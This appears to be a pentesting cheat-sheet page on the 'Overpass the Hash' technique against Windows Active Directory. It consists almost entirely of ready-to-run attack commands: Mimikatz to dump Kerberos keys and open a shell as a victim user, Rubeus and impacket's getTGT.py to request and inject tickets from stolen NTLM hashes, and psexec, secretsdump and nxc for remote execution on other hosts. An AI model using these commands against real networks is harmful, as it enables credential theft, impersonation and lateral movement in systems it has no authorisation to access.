Overpass the Hash

Only with NTLMv1.

Turn a Kerberos Key (these include the NTLM hash, RC4) of a domain user into a Kerberos Ticket (TGT), and use it for authentication. Valid only for the machine for which it was created.

Mimikatz

Requires Administrator Privileges

View Kerberos Keys

.\mimikatz.exe    
> privilege::debug
> sekurlsa::ekeys

New CMD with victim user.

> sekurlsa::pth /domain:<DOMAIN> /user:<USER> /ntlm:<KEY/NTLM> [/run:Powershell.exe]

There is also /rc4,/aes128 or /aes256

After that, in the new terminal with the victim's ticket you can

net use //<ComputerName>
PsExec.exe \\<ComputerName> cmd.exe -accepteula

Rubeus

NOT Requires Administrator Privileges

Create new TGT for given user, view it and then upload it (like it was a cookie).

.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /nowrap 
# printed in base64

.\Rubeus.exe ptt /ticket:<BASE64_TICKET>

Or create new TGT for given user and upload it immediately without displaying it.

.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /ptt

Also possible to use: /aes128, /aes256, /des

With getTGT get the TGT

getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>' -hashes :<NTLM_HASH>

Import it

chmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klist

Use with Kerberos authentication (-k)

nxc smb <IP_TARGET> --use-kcache --kdcHost <HOSTNAME_DC>
psexec.py -k -no-pass -dc-ip <DC_IP> <HOSTNAME_TARGET>
# also with impacket-secretsdump, impacket-wmiexec, etc.

Last updated 12 days ago

hashtagMimikatzarrow-up-right

hashtagRubeusarrow-up-right

Mimikatz

Rubeus